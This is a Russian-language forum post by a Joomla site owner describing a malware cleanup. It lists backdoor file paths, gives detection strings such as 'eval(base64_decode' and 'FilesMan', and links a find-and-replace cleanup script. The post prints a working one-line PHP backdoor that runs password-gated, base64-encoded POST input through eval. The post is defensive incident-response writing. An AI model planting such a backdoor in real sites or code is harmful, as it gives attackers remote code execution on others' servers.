вот обещанный скрипт
http://cmsdev.org/files/cnt.php?file=replace.zip (новая версия
http://secu.ru/scripts/find-and-replace), в архиве файл, кидаете в корень сайта, запускается так -
http://example.com/replace.php?pas=joomla, где example.com - адрес вашего сайта)
вчера при помощи его нашел еще пару вредоносных файлов, из 24 сайтов оказалось зараженных 6, а не 3 как я думал (спасибо
flyingspook что навел, советую к нему обращаться с подобными проблемами), вот список файлов:
components/com_content/models/index.php - находил во всех 6 сайтах, файл представляет из себя полноценный ftp клиент, со всеми нужными функциями работы с файлами на хостинге, почти тоже самое что
oriol показал во втором ответе (shell), тот же файл находился в:
components/com_content/views/archive/tmpl/bloger.php:
components/com_poll/models/index.php:
components/com_user/models/index.php:
components/com_search/models/index.php:
modules/mod_mainmenu/tmpl/index.php:
modules/mod_login/tmpl/index.php:
modules/mod_poll/tmpl/index.php:
modules/mod_footer/tmpl/index.php:
modules/mod_stats/tmpl/index.php:
modules/mod_wrapper/tmpl/index.php:
т.е. или в компонентах или в модулях, и вообще если видите файл index.php в папках components или modules то он там не должен быть 100%
также заодно нашел еще пару файлов на одном из 6 сайтов, т.е. он был "обложен" дважды, разными "кулхацкерами", так как дата создания components/com_content/models/index.php - 28.12.2011, а logs/thumbs.php - 22.07.2010, вот где лежал бекдор нумбер2
cache/thumbs.php:
images/stories/thumbs.php:
logs/thumbs.php:
plugins/system/ping.php:
tmp/thumbs.php:
в этих файлах был следующий код
<?php if(md5($_POST["password"])=="c2725594aaf2c0327abf7d144c3f991c"){eval(base64_decode($_POST["code"]));}?>
нашел я все это через вышеуказанный скрипт, искал по следующим словам
1. "eval(base64_decode" - а также варианты с пробелами между скобок
2. "FilesMan" - с подобного начинался файл шелла, который я нашел на сервере
есть еще много вариаций на поиск "шеллов" и "бекдоров", но мне хватило только этих двух строк, заражений пока не наблюдал (день прошел), обычно код который приводил ТС появлялся в файлах на следующий день после удаления
P.S. Не забывайте после использования скрипта, удалять его с сервера или в коде менять пароль на свой, так как это большая дыра в безопасности, и вообще осторожно что-то заменяйте, (для новичков!) если заменить хоть один символ на другой символ или на "ничего", то сайту кабздец (это и так понятно, но на всякий написал)